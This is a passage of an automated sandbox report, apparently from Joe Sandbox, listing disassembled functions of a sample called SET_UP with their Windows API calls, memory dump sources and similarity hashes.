                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1948546556-0
                                                                                                                                                                                                  • Opcode ID: 7cda671187150bc083be67b697f1499b3ffbd55bcf65c6f02cd13432b14b04e3
                                                                                                                                                                                                  • Instruction ID: 22b9f92d54a873c26f6310d1dfbd7a8e634c42dc3e48f486ef77826805365ca4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cda671187150bc083be67b697f1499b3ffbd55bcf65c6f02cd13432b14b04e3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B51A7346443899FDF218F58C8847AA7BB0BF27315F14449BE8618B3B1D378D946CB69
                                                                                                                                                                                                  Function 004A1EE2 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000002,00508FBC,00508FBC), ref: 004A1FA9
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                                  • Opcode ID: 5f71bd9f4b30a49d9fd1c5775c0499a104ef2b4afc58fccc5e3b6b11dcf8c51f
                                                                                                                                                                                                  • Instruction ID: fa960aba0f47fcc12a841f69d33f50f88100bff9ddd78bb40f720d0be586ea8f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f71bd9f4b30a49d9fd1c5775c0499a104ef2b4afc58fccc5e3b6b11dcf8c51f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA51D031904248EFCB11CF68C984ADE7BF4FF66344F1081AAF9159B2A1D774DA40DB69
                                                                                                                                                                                                  Function 004B8EF8 Relevance: 6.1, APIs: 4, Instructions: 85stringtimeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrcpynW.KERNEL32(004B8EF4,?,00000104,?,?,?,?,?,?,?,004B8EE2,?), ref: 004B8F22
                                                                                                                                                                                                  • GetFileTime.KERNEL32(00000000,004B8EE2,?,?,?,?,?,?,?,?,?,004B8EE2,?), ref: 004B8F43
                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,004B8EE2,?), ref: 004B8F52
                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,004B8EE2,?), ref: 004B8F73
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$AttributesSizeTimelstrcpyn
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1499663573-0
                                                                                                                                                                                                  • Opcode ID: 41e4a547913c984589b36b8e74b49e47be8e0dd4eacf0fe454b1b7573e501ef8
                                                                                                                                                                                                  • Instruction ID: 9edc1834e99d1d2eb06a4d9f35e6da745e1b8b32c249a5dfe75214eaa3991122
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41e4a547913c984589b36b8e74b49e47be8e0dd4eacf0fe454b1b7573e501ef8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92316FB2500209AFD711DF61C885FEBB7BCBB14350F104A2EF156C7691EB74A985CBA4
                                                                                                                                                                                                  Function 004B5EB7 Relevance: 6.1, APIs: 4, Instructions: 85synchronizationCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004B5EBC
                                                                                                                                                                                                    • Part of subcall function 004C657B: TlsGetValue.KERNEL32(0050B044,?,00000000,004C4B8C,004111C1,004C4BA8,004B5FEA,004B9143,?,00000000,?,004AEEBC,00000000,00000000,00000000,00000000), ref: 004C65BA
                                                                                                                                                                                                    • Part of subcall function 004B60C0: GetCurrentThreadId.KERNEL32 ref: 004B60D3
                                                                                                                                                                                                    • Part of subcall function 004B60C0: SetWindowsHookExW.USER32(000000FF,V,00000000,00000000), ref: 004B60E3
                                                                                                                                                                                                  • SetEvent.KERNEL32(?,Function_000C4BEF), ref: 004B5F78
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004B5F81
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004B5F88
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCurrentEventH_prologHandleHookObjectSingleThreadValueWaitWindows
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3726718227-0
                                                                                                                                                                                                  • Opcode ID: aa40b39999d112c5efc0f2eb7aad891f38c3c153a6e246c614cb707fc88aa021
                                                                                                                                                                                                  • Instruction ID: ad4b30656a7963245859738abd4c11cf75e6096271a1a2d74e0e23e8edb0b0d3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa40b39999d112c5efc0f2eb7aad891f38c3c153a6e246c614cb707fc88aa021
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6731C435600605DFCB14EFA5C984FAEF7B1FF08314B10456EE102972A2D778EA05CBA8
                                                                                                                                                                                                  Function 00421735 Relevance: 6.1, APIs: 4, Instructions: 68registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000001,00000000,?,?), ref: 00421789
                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000003,00000000,00000000,?,?,?), ref: 004217BA
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000003), ref: 004217C7
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000003), ref: 004217CF
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Close$CreateQueryValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2495337196-0
                                                                                                                                                                                                  • Opcode ID: 8ed7a6e882857e5c2c9f245c9fe8f18630eea1d9fba9ad4baa5b32b3de14ec81
                                                                                                                                                                                                  • Instruction ID: 84ee58df59d8203c5bdcd8f158001bebc26cc250c6a1f7bec96dbed6ef5e3b05
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ed7a6e882857e5c2c9f245c9fe8f18630eea1d9fba9ad4baa5b32b3de14ec81
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9215C71A01128BACB219FA2DC48EDFBFBCEF44794F104466B519E2190D7B48A84DBA5
                                                                                                                                                                                                  Function 004A8C7F Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,?,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8CAE
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,0049B392,?,00000000,00000000,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8CC1
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,0049B392,?,?,00000000,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8D0D
                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00000000,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8D25
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide$CompareString
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 376665442-0
                                                                                                                                                                                                  • Opcode ID: 92feb035c5d2fa4473386bf032988dffe11230512ac25e2f1803e3f70c81a7c5
                                                                                                                                                                                                  • Instruction ID: 3e49b5a23b367b31cbc147386a3b318945d71659a9f284a3cc509549e12b337f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92feb035c5d2fa4473386bf032988dffe11230512ac25e2f1803e3f70c81a7c5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3521477290024DEBDF218F84CC41DDEBFB1FF59364F10412AFA10A61A0D73A9922DBA4
                                                                                                                                                                                                  Function 004B9085 Relevance: 6.1, APIs: 4, Instructions: 66timeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004B9101
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 004B9112
                                                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004B9121
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 004B912C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$File$ErrorLast$LocalSystem
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1172841412-0
                                                                                                                                                                                                  • Opcode ID: 8aed24414badc3968f83a43decd0ab5d1b8cbe5cdf34bf0d1d02216328c53bdf
                                                                                                                                                                                                  • Instruction ID: 42bd361f49f1fd2321d6424cf0eca1b57f1e6e82198632a67778f5f1b0e10034
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aed24414badc3968f83a43decd0ab5d1b8cbe5cdf34bf0d1d02216328c53bdf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1119319A01215A6CF00BBE69805DEFB7BEAF85704B04404BF901A7232EA78C941C7BC
                                                                                                                                                                                                  Function 004AC260 Relevance: 6.1, APIs: 4, Instructions: 65windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetPropA.USER32(?,?), ref: 004AC29D
                                                                                                                                                                                                  • SendMessageA.USER32(?,00001944,00000000,?), ref: 004AC2C2
                                                                                                                                                                                                  • SendMessageA.USER32(?,00001943,00000000,?), ref: 004AC2D7
                                                                                                                                                                                                  • RemovePropA.USER32(?,?), ref: 004AC2ED
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessagePropSend$Remove
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2793251306-0
                                                                                                                                                                                                  • Opcode ID: c98d151dd389b8e4af454005f2ef070a7b048c9cf3beb642a7ca649caffff8fc
                                                                                                                                                                                                  • Instruction ID: 475ec370502cebf516315e9520fa181844cf79cd018bf4ee4497b68d130d37eb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c98d151dd389b8e4af454005f2ef070a7b048c9cf3beb642a7ca649caffff8fc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6117BA95013107AF6009B15EC45FBB739CEB95765F004429FD1592241E3786D0A8BBB
                                                                                                                                                                                                  Function 004813A0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 65stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004811D0: lstrlenA.KERNEL32(?), ref: 004811F6
                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,FFFFFFFF,(:D,?,00000000,00000000,00000080,00000000,?,FFFFFFFF), ref: 004813EC
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                  • String ID: (:D$E$X
                                                                                                                                                                                                  • API String ID: 1659193697-2767535589
                                                                                                                                                                                                  • Opcode ID: 963e50ad427fd3677b3fc9ba653bab18dd1b5f5e0bd2af760be697e6eb825f36
                                                                                                                                                                                                  • Instruction ID: 0ac33c97d1d75ecbe0364a5059c8a07b551a5a3da9f1de8ea84b126ad474a7e7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 963e50ad427fd3677b3fc9ba653bab18dd1b5f5e0bd2af760be697e6eb825f36
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E1108614083846BE301EA55AC40E7FBBACDBD2B08F44491FFD4812213D7599E0E83B3
                                                                                                                                                                                                  Function 0041C44B Relevance: 6.1, APIs: 4, Instructions: 61windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetMessageW.USER32(?,?,?,?), ref: 0041C476
                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0041C483
                                                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 0041C48D
                                                                                                                                                                                                  • GetMessageW.USER32(?,?,?,?), ref: 0041C4BA
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$DispatchTranslate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1706434739-0
                                                                                                                                                                                                  • Opcode ID: 44ee93da1e2eee9d3780ea833ba164dfed4cf03be1e301763fd4eb9442b8f3f2
                                                                                                                                                                                                  • Instruction ID: 7ec16b723d3bcfda4191fa07cc38053b2163a35b35edffb2336d47764a4d6d1d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44ee93da1e2eee9d3780ea833ba164dfed4cf03be1e301763fd4eb9442b8f3f2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC11123294421BA7DF209EE1DCD4EFF7B7CAB41744F144427E90492150E238D9458BA9
                                                                                                                                                                                                  Function 0043927E Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,00000420), ref: 004392A0
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004392AD
                                                                                                                                                                                                    • Part of subcall function 004B00CE: SendMessageW.USER32(?,00001061,?,00000005), ref: 004B0117
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004392D3
                                                                                                                                                                                                  • PathFindFileNameW.SHLWAPI(?,00000001,00508FBC,00000000,?), ref: 004392F5
                                                                                                                                                                                                    • Part of subcall function 004B5698: SetWindowTextW.USER32(?,?), ref: 004B56A6
                                                                                                                                                                                                    • Part of subcall function 00439315: __EH_prolog.LIBCMT ref: 0043931A
                                                                                                                                                                                                    • Part of subcall function 00439315: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00439339
                                                                                                                                                                                                    • Part of subcall function 00439315: PathFindFileNameW.SHLWAPI(?,00000001,00000000,File Name,00000000,00000000,00000000,00000000,00000410,?,?,00508FBC), ref: 00439375
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$FileFindNamePath$ClientH_prologMetricsRectSystemTextWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2817607957-0
                                                                                                                                                                                                  • Opcode ID: bd10ec16099347bc078ac663bc15d6b26c0e3202bf92b468939cab205ef67100
                                                                                                                                                                                                  • Instruction ID: 28c8ef04bfa2c3790541f33992d10680e51783e0dcfa2e42b9bd0ba44d13de14
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd10ec16099347bc078ac663bc15d6b26c0e3202bf92b468939cab205ef67100
